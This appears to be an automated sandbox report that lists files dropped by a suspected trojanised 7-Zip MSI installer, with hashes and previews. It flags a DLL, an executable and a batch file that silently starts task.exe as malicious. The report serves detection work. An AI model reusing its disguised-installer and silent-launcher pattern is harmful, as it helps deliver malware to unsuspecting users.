                                                                                                                                                              SHA-256:A0137F3B1DBFB1FA98C74CC33F80E1F46BF58BC90323A38D32CF3B5798103B72
                                                                                                                                                              SHA-512:4FDBF72DDF9EA8A1EFF700EB267868CB6A0FE87CAE2536FB2086D8373AACF6A7EEF9862654FFFA38DBDE50AE0518CA8E5B46791FB3165493F7D0CA9741C84486
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:........................................nD..../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\SmartScreen\RemoteData\customSynchronousLookupUris

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):29
                                                                                                                                                              Entropy (8bit):3.922828737239167
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:2NGw+K+:fwZ+
                                                                                                                                                              MD5:7BAAFE811F480ACFCCCEE0D744355C79
                                                                                                                                                              SHA1:24B89AE82313084BB8BBEB9AD98A550F41DF7B27
                                                                                                                                                              SHA-256:D5743766AF0312C7B7728219FC24A03A4FB1C2A54A506F337953FBC2C1B847C7
                                                                                                                                                              SHA-512:70FE1C197AF507CC0D65E99807D245C896A40A4271BA1121F9B621980877B43019E584C48780951FC1AD2A5D7D146FC6EA4678139A5B38F9B6F7A5F1E2E86BA3
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:customSynchronousLookupUris_0

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\SmartScreen\RemoteData\customSynchronousLookupUris_0

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):35302
                                                                                                                                                              Entropy (8bit):7.99333285466604
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                              MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                              SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                              SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                              SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):18
                                                                                                                                                              Entropy (8bit):3.5724312513221195
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:kDnaV6bVon:kDYa2
                                                                                                                                                              MD5:5692162977B015E31D5F35F50EFAB9CF
                                                                                                                                                              SHA1:705DC80E8B32AC8B68F7E13CF8A75DCCB251ED7D
                                                                                                                                                              SHA-256:42CCB5159B168DBE5D5DDF026E5F7ED3DBF50873CFE47C7C3EF0677BB07B90D4
                                                                                                                                                              SHA-512:32905A4CC5BCE0FE8502DDD32096F40106625218BEDC4E218A344225D6DF2595A7B70EEB3695DCEFDD894ECB2B66BED479654E8E07F02526648E07ACFE47838C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:edgeSettings_2.0-0

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\SmartScreen\RemoteData\edgeSettings_2.0-0

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:JSON data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):3581
                                                                                                                                                              Entropy (8bit):4.459693941095613
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:JTMhnytNaSA4BOsNQNhnUZTFGKDIWHCgL5tfHaaJzRHF+P1sYmnfHUdT+GWBH7Y/:KyMot7vjFU
                                                                                                                                                              MD5:BDE38FAE28EC415384B8CFE052306D6C
                                                                                                                                                              SHA1:3019740AF622B58D573C00BF5C98DD77F3FBB5CD
                                                                                                                                                              SHA-256:1F4542614473AE103A5EE3DEEEC61D033A40271CFF891AAA6797534E4DBB4D20
                                                                                                                                                              SHA-512:9C369D69298EBF087412EDA782EE72AFE5448FD0D69EA5141C2744EA5F6C36CDF70A51845CDC174838BAC0ADABDFA70DF6AEDBF6E7867578AE7C4B7805A8B55E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:{"models":[],"geoidMaps":{"gw_my":"https://malaysia.smartscreen.microsoft.com/","gw_tw":"https://taiwan.smartscreen.microsoft.com/","gw_at":"https://austria.smartscreen.microsoft.com/","gw_es":"https://spain.smartscreen.microsoft.com/","gw_pl":"https://poland.smartscreen.microsoft.com/","gw_se":"https://sweden.smartscreen.microsoft.com/","gw_kr":"https://southkorea.smartscreen.microsoft.com/","gw_br":"https://brazil.smartscreen.microsoft.com/","au":"https://australia.smartscreen.microsoft.com/","dk":"https://denmark.smartscreen.microsoft.com/","gw_sg":"https://singapore.smartscreen.microsoft.com/","gw_fr":"https://france.smartscreen.microsoft.com/","gw_ca":"https://canada.smartscreen.microsoft.com/","test":"https://eu-9.smartscreen.microsoft.com/","gw_il":"https://israel.smartscreen.microsoft.com/","gw_au":"https://australia.smartscreen.microsoft.com/","gw_ffl4mod":"https://unitedstates4.ss.wd.microsoft.us/","gw_ffl4":"https://unitedstates1.ss.wd.microsoft.us/","gw_eu":"https://europe.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):47
                                                                                                                                                              Entropy (8bit):4.493433469104717
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:kfKbQSQSuLA5:kyUc5
                                                                                                                                                              MD5:3F90757B200B52DCF5FDAC696EFD3D60
                                                                                                                                                              SHA1:569A2E1BED9ECCDF7CD03E270AEF2BD7FF9B0E77
                                                                                                                                                              SHA-256:1EE63F0A3502CFB7DF195FABBA41A7805008AB2CCCDAEB9AF990409D163D60C8
                                                                                                                                                              SHA-512:39252BBAA33130DF50F36178A8EAB1D09165666D8A229FBB3495DD01CBE964F87CD2E6FCD479DFCA36BE06309EF18FEDA7F14722C57545203BBA24972D4835C8
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:synchronousLookupUris_636976985063396749.rel.v2

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\SmartScreen\RemoteData\synchronousLookupUris_636976985063396749.rel.v2

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):35302
                                                                                                                                                              Entropy (8bit):7.99333285466604
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                              MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                              SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                              SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                              SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Variations

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:JSON data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):86
                                                                                                                                                              Entropy (8bit):4.3751917412896075
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQan:YQ3Kq9X0dMgAEwjM
                                                                                                                                                              MD5:961E3604F228B0D10541EBF921500C86
                                                                                                                                                              SHA1:6E00570D9F78D9CFEBE67D4DA5EFE546543949A7
                                                                                                                                                              SHA-256:F7B24F2EB3D5EB0550527490395D2F61C3D2FE74BB9CB345197DAD81B58B5FED
                                                                                                                                                              SHA-512:535F930AFD2EF50282715C7E48859CC2D7B354FF4E6C156B94D5A2815F589B33189FFEDFCAF4456525283E993087F9F560D84CFCF497D189AB8101510A09C472
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":0}

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\ba7cbed2-d23d-4fba-9328-ab5bc55c5d3f.tmp

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:JSON data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1372
                                                                                                                                                              Entropy (8bit):5.5443902513238
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:YpQBqDPak7u5rrt1+/emJFyX8x9WwgyikOJdXmuBuwBwja9IENhlA+X7QQRCYfYg:YuBqDPafuJM8vmZRBzB4iIelA+EB0
                                                                                                                                                              MD5:385BE2D3EAEE8D782BB104CBC41056E5
                                                                                                                                                              SHA1:513716501759B5EC3ECAC0E60662E8F59F708AB4
                                                                                                                                                              SHA-256:1C4DE1B12E00DEE53ECD26D2C8F18BB2C17A5E4403A30F6A0A24834CF3321388
                                                                                                                                                              SHA-512:847306E2F352B18F14D586A893872EF8E3BDAAD016A15274C832DBF8D907154975F2816B5BDD9138E2C131F1920C2E9A8080E51F788DEB2AA30CD753D4FEF4E1
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAC+iLm2Zr7aQKM/QMbOv3p0EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAABP3bqCLIIKULZltKi9naM/NsvjHziFuEObTMT1vXQENAAAAAAOgAAAAAIAACAAAABtMxtfCiQ0HI8W/DJehMIUsnPu/LG+d5TdDuLQSLjn5DAAAAC6rCjpeKykHLu1xImseQaYTi3WjJT27iNlfniGO7Co3Jrxmxi3LVrts6ZkzhjRGSVAAAAAHDkHlxhbJAEPhcLOFI09zETSMTMr9eCqhMrME9N2qmM6xEFhdzzUGADkw/sDe37nc9mKZvhc9lVMimzveK0Jng=="},"profile":{"info_cache":{},"profile_counts_reported":"13376658440579494","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":false},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1732184840"},"user_experien

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\gifwhgt

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Users\user\task.exe
                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2
                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Qn:Qn
                                                                                                                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:..

                                                                                                                                                              C:\Users\user\apps.bat

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe
                                                                                                                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):70
                                                                                                                                                              Entropy (8bit):4.377806460743142
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:mKDDFARE3BF//I+K9sALX:hmRACaALX
                                                                                                                                                              MD5:F8ABF91D350D39FF1A48934B88624291
                                                                                                                                                              SHA1:88EF29FD18441C628A43925A8B32535D39E07979
                                                                                                                                                              SHA-256:5B4E3E3F739B1AE3CD907A0ABE9D5AAF51455551F69F9DA57E668F749584EFD6
                                                                                                                                                              SHA-512:3C572C7415FBC8EE5F976AC9B6CCE43C901174777C859E9461451676BD5158E940E0BD173D83D980958295CB9DAACC489F0D596D98E93F71CB81D2603F037876
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              Preview:@echo off..setlocal..cd /d "%~dp0"..start /B "" "task.exe"..endlocal..

                                                                                                                                                              C:\Users\user\data.bin

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):482524
                                                                                                                                                              Entropy (8bit):7.997356907892145
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:12288:xVafxSS8uR/EN9QyGcEdjUi7hJqef1euJigVxNAjJ1mad:+pnoOKi7Hpf1Qwr41
                                                                                                                                                              MD5:1CB29EF9003E93F65B93CE8B8B7C24DD
                                                                                                                                                              SHA1:9BE4AA7AB2E4C71DC70D03AF435330C6BFB5C470
                                                                                                                                                              SHA-256:9BE5145BAEB34D733AF9A7FA55139A4917EF080D777AC8EC7F5E8B42620605E6
                                                                                                                                                              SHA-512:259EFB3FE2842908DCF4E4950DA40DBDC6803DDF0DD5BA6716486CB715F356068A94E066CEEFD4ED42D949787D6FC9190483C799ADD5D08620E16B4BC00BBA3C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:U......]..h.Z\...F...@...F..l7...cR.................y....a!......U=]XXV.....].m...J;...q.-.Vh.z."...n...w..*>..U....Uh.1.T..>...7.s]*...A2..a-...yw..-...........,.n_..|)^..L..S7f~~~x.s.E....R..u..q.8888&-.n..3./......h..S6!.?....N:..........e..... ...\R..a'..>.I.....$M._.co.O.I..oooO.i$..".c..{.bx.TJ50...I.M,...k"-A......~.....[...O...+.........}[..hd..k......H.Yq....LI..ys.. . .Zy...6......h.......~;.........+.wn.mu........,.{.._$..`$%%...U&^Z........._........Y...IF}..kC..xg...........gj{..............v.+$X.....[_..883..kC.h.^...CW......<......N7..{W.a...VVVP......p..TTTB......o.....Q.......H.o~...i.......o.Nb87|d.%........0....<...xI..vw..R..ye.....Z...b.\\89.0.f.R'...JK.&5D.1D.....W..y...\\Z)dfW..6?70..e..a...#.RR..P&._a]H....X.I.........#...nx.X.z..(..&..}|.H...d..p....ATj.p^.osu5...c.c...Q^..HKCBB.s.::::...O.(.../.&....:....U..N^........:.....C..........6\....h..Ay..X....54s5..n.q.KG~F8m.xyyyE.J.Ex....[...e~...~..P...'K12.&..

                                                                                                                                                              C:\Users\user\g2m.dll

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:modified
                                                                                                                                                              Size (bytes):617472
                                                                                                                                                              Entropy (8bit):6.064860346549003
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:mwyPp3TItEKRC3YtYq0H+J6nEYpaM7Fd5ktc2/ZLvJ6Asu/uDc:mwggE2C3YtYq0eJgEYpaMnF2LvJ9/K
                                                                                                                                                              MD5:FC284EEE599385A7AE9F098D123E983F
                                                                                                                                                              SHA1:ACAA1C92D85AFD92184D49592AED3AEAB6AD2DED
                                                                                                                                                              SHA-256:16414419A8248A4A55C05859C467D1FAFC298694F3F71916261FE2E08EBF4ABD
                                                                                                                                                              SHA-512:C2538A98DE60AEDDB72CB14513ECCE3493F04E94135182AF658D3FC6425AD890560945EFB02C956B11AA10606C95E7CB286E73C0D27E71F2B17D3494506E7123
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D\.v*..v*..v*...)..v*.../."v*......v*.k./..v*.k....v*.k.)..v*...+..v*..v+..v*.Z....v*..v*..v*.Z.*..v*.Z.(..v*.Rich.v*.................PE..L...Z=Bf.........."!...'.N...&...............`............................................@.........................p...........d............................P...G..@f..T....................f.......e..@............`...............................text....M.......N.................. ..`.rdata...e...`...f...R..............@..@.data....v.......l..................@....reloc...G...P...H...$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\task.exe

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):40376
                                                                                                                                                              Entropy (8bit):5.902054884820747
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:YRQnUhG5bZDOTpkdD82YbQkRFokFWIILPUh:FWObZDOTpk5T6zqAh
                                                                                                                                                              MD5:F1B14F71252DE9AC763DBFBFBFC8C2DC
                                                                                                                                                              SHA1:DCC2DCB26C1649887F1D5AE557A000B5FE34BB98
                                                                                                                                                              SHA-256:796EA1D27ED5825E300C3C9505A87B2445886623235F3E41258DE90BA1604CD5
                                                                                                                                                              SHA-512:636A32FB8A88A542783AA57FE047B6BCA47B2BD23B41B3902671C4E9036C6DBB97576BE27FD2395A988653E6B63714277873E077519B4A06CDC5F63D3C4224E0
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.1..._..._..._......._...^..._......._......._......._.Rich.._.........................PE..L.....P.....................|............... ....@.................................-........................................!..P....P...t..........................0 ............................................... ..0............................text...5........................... ..`.rdata....... ......................@..@.data........0......................@....CRT.........@......................@..@.rsrc....t...P...v..................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Windows\Installer\434f23.msi

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: 7-Zip 24.01 (x64) 24.1.0.0, Subject: 7-Zip 24.01 (x64), Author: Igor Pavlov, Keywords: Installer, Template: x64;1033, Revision Number: {5131F5EE-04FE-4DDC-B86B-F721A2EEC0E9}, Create Time/Date: Thu Jan 11 14:59:38 2024, Last Saved Time/Date: Thu Jan 11 14:59:38 2024, Number of Pages: 200, Number of Words: 12, Name of Creating Application: MSI Wrapper (11.0.53.0), Security: 2
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1753088
                                                                                                                                                              Entropy (8bit):7.884974179529995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:49152:BpRhaYJ+2/8yJ5OA4COg9lyp31X01clj+u1GTsF:BpDJ+2pgA4+6p31is+u1G4
                                                                                                                                                              MD5:7C26877FCD894CC1355F2A31A551243C
                                                                                                                                                              SHA1:80104216DA4CD3449EABF0E0DE2BB3A5B2DE85CA
                                                                                                                                                              SHA-256:FF389718792F877FBDABE5CB02A1B3D5DE5BE988F9B5690250FFDF3409F04000
                                                                                                                                                              SHA-512:A57A961A3339B105F9D5653B69269ED7AAB952A4E16600426EDEE80D628A9AC62A13B5EA642FFD9765FDADA7B0DB5C5A85A21BC88C125BE122BF3C4E89D0CFB8
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Windows\Installer\MSI509A.tmp

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:modified
                                                                                                                                                              Size (bytes):212992
                                                                                                                                                              Entropy (8bit):6.513409725320959
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3072:xspAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCL42loHUvU0yGxr5GqM2a8:jtOdiRQYpgjpjew5DHyGxcqo8
                                                                                                                                                              MD5:0C8921BBCC37C6EFD34FAF44CF3B0CB5
                                                                                                                                                              SHA1:DCFA71246157EDCD09EECAF9D4C5E360B24B3E49
                                                                                                                                                              SHA-256:FD622CF73EA951A6DE631063ABA856487D77745DD1500ADCA61902B8DDE56FE1
                                                                                                                                                              SHA-512:ED55443E20D40CCA90596F0A0542FA5AB83FE0270399ADFAAFD172987FB813DFD44EC0DA0A58C096AF3641003F830341FE259AD5BCE9823F238AE63B7E11E108
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p...p...p.......p.....p..../.p.......p...q.%.p.......p.....p.....p.Rich..p.........................PE..L...Y..e...........!.....h..........K................................................]....@.........................P...]............P.......................`.....................................p...@...............t............................text....f.......h.................. ..`.rdata...............l..............@..@.data....5..........................@....rsrc........P......................@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Windows\Installer\SourceHash{0028494D-9E28-4DD9-A336-17E8D634DF88}

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):20480
                                                                                                                                                              Entropy (8bit):1.1640027875426617
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:JSbX72FjzvQAGiLIlHVRpZh/7777777777777777777777777vDHFeyv3it/l0i5:J5vQQI5t81iF
                                                                                                                                                              MD5:90C3BA3CF1C8E7FF1E56F68B3D22E302
                                                                                                                                                              SHA1:EBCFE0F0610FE736E79DF8144649E08774A69E29
                                                                                                                                                              SHA-256:D922C431BB3A8725626C54ACA6D03DACE34B0918064C419313C59360A7041E33
                                                                                                                                                              SHA-512:83A71EF1A8CB026813A118C6D06B1FECA11727BEAE4D878DBFD78D5B34D3FE728D4D042707EEB814257C1F5C3D1637EA635B0CD64533A25BD76C66C852942CB8
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):20480
                                                                                                                                                              Entropy (8bit):1.499693131712612
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:j8PhquRc06WXJaFT5uVmdASPgsrlqdASBq4rl0kU:Khq1RFTwVxj4Fqq
                                                                                                                                                              MD5:9E576925D6875B83750F21DECF01F3A8
                                                                                                                                                              SHA1:5359EFB812F0F2F7948EEAC9E9AC5136C8D684A7
                                                                                                                                                              SHA-256:CB59EBAE8CB3F3B0E1F74751E9A29044725699390B62747A7F72BBB8782E9822
                                                                                                                                                              SHA-512:3A37CAAE6CB669607B85EFE5FC7E11FA8EBE51CD46339F777CA42209F4BE2C38B44382D7868E1D7F0028329AC92BD9BCB727281E131DEBAB7E6CF28EC54B3944
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Windows\Logs\DPX\setupact.log

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                              File Type:CSV text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):345054
                                                                                                                                                              Entropy (8bit):4.386425894902289
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:0K9KmK9KIK7KIK7KYK7KIK7KYK7KIK7KYK7KIK7KYK7KIK7KYK7KIK7KYK7KIK7N:m
                                                                                                                                                              MD5:0F10BF248874EB7BA14069DF267ABE7B
                                                                                                                                                              SHA1:32AFF36EAEBF20CC60532B6FCB7B8B9F5BBD8A33
                                                                                                                                                              SHA-256:542ABD593DBCA2277D5197EC101C299F16EAF277A260073695CC0F17BDBD2CD7
                                                                                                                                                              SHA-512:75BBE373EDF8392151B45D6199A413F38E1F75FC08F1F61ED02BD0E37285ECA9E131FD4CE3BCAE961417441E998FD584F82711E7D68A81DEA03DA6AF917DE26E
                                                                                                                                                              Malicious:false
